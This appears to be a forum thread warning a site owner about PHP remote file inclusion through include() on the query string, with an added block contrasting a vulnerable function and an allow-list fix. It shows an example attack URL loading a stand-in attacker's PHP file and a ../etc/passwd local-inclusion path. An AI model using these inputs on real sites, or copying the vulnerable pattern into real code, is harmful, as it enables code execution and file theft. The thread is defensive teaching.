http://your.server.com/file.php?http://mysite.com/myillicitcode.php
That's right, include(), by default, will happily process files from remote sites. Which means I could write any code I wanted and your file would process it right there, in place. Which means I could write some code to, say, list out the entire contents of your directory tree and/or print the contents of any file from your site I want. Or launch attacks on remote sites so that it looks like you're the attacker, or spam everyone on the planet, or whatever.
Do you see what I'm saying now? It's simple enough to prevent this kind of thing. You cannot include things from the query string. You just can't.
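For readers who want to see the pattern the post is warning about beside a fixed version, here is an added example; it is not the poster's code and not the code from the site being discussed. It assumes a script that hands the raw query string to include(), which matches the shape of the URL above, and replaces it with a version that only ever maps a request parameter to a key in a fixed allow-list. The pages/ directory, the page names and the ?page= parameter are illustrative. One caveat from the PHP side: on PHP 5.2 and later, fetching a remote file through include() also requires the allow_url_include ini setting, which is off by default; the allow-list fix below does not depend on that setting and additionally blocks local-file inclusion through ../ paths, which the ini setting does nothing about.

```php
<?php
declare(strict_types=1);

// Added example for this thread, not code from the original site.
// Assumptions: a "pages/" directory next to this file, and the page to
// display chosen with ?page=NAME. Names and paths are illustrative.

// --- Vulnerable pattern (do not deploy) ----------------------------------
// This is what the thread describes: the query string reaches include()
// unchanged. With allow_url_include on, ?http://mysite.com/myillicitcode.php
// fetches and executes attacker-supplied PHP inside this script. Even with
// it off, ?../../../../etc/passwd reads local files (local file inclusion).
function vulnerableInclude(): void
{
    $target = $_SERVER['QUERY_STRING'];   // fully attacker-controlled
    include $target;                      // remote or local file inclusion
}

// --- Hardened pattern -----------------------------------------------------
// Request data selects a key; the key selects a path. No request value is
// ever used as a path or a URL.
const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

/**
 * Map a requested page name to a local file path, or return null when the
 * name is not on the allow-list. Kept free of side effects so it is easy
 * to unit-test with strings such as "about", "../etc/passwd" or a URL.
 */
function resolvePage(?string $name): ?string
{
    $name = $name ?? 'home';
    if (!array_key_exists($name, PAGES)) {
        return null;
    }
    return __DIR__ . '/' . PAGES[$name];
}

function safeInclude(): void
{
    // ?page[]=x would arrive as an array; treat anything but a plain
    // string as "not a valid page name" instead of letting it through.
    $requested = $_GET['page'] ?? null;
    $path = resolvePage(is_string($requested) ? $requested : null);

    if ($path === null || !is_file($path)) {
        http_response_code(404);
        exit('Unknown page');
    }
    include $path;
}

safeInclude();
```

Two settings in php.ini are worth checking alongside the code change: allow_url_include should be Off (the default since PHP 5.2), and allow_url_fopen can be turned Off as well if nothing on the site legitimately opens remote URLs. Neither replaces the allow-list; they only narrow what a bug like the one above can be turned into.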
Sure, I'm willing to help, if I can. You can try to describe it without getting into specifics like passwords and such - I'm sure you can figure out a way to lay it out.
You're just going to have to take my word that it's a very real, well-known and serious security problem. It's known as code injection. In fact it's spelled out under "security warning" in the official documentation for the include function. I don't know how else I can warn you.
Well, assuming that you don't have any XML functions in the code you're talking about here, that XML warning is coming from the remote site, which means it is doing it
I tried emailing you but I got a mailer daemon error. Anyways, this is what I said:
Yeah, I do have database access. I'm willing to assume I've gone about everything wrong and am open to suggestion and willing to do the base over again. Any help would, well, help. =P
Aye. Whispering didn't make the topic look unread to me, nor did it notify me that I had a whisper, and so I didn't know he had whispered me until 5 days or so after. This way, it gives an indication.
Haha... I haven't been around in a while. No, I didn't lose interest. Can you try emailing me again? It's a Gmail address, you shouldn't have any delivery problems.
I'll try to work on the wording of how my code is all laid out for ease of readability.
http://onemanshortproductions.com
So you can see what I'm working with, at least.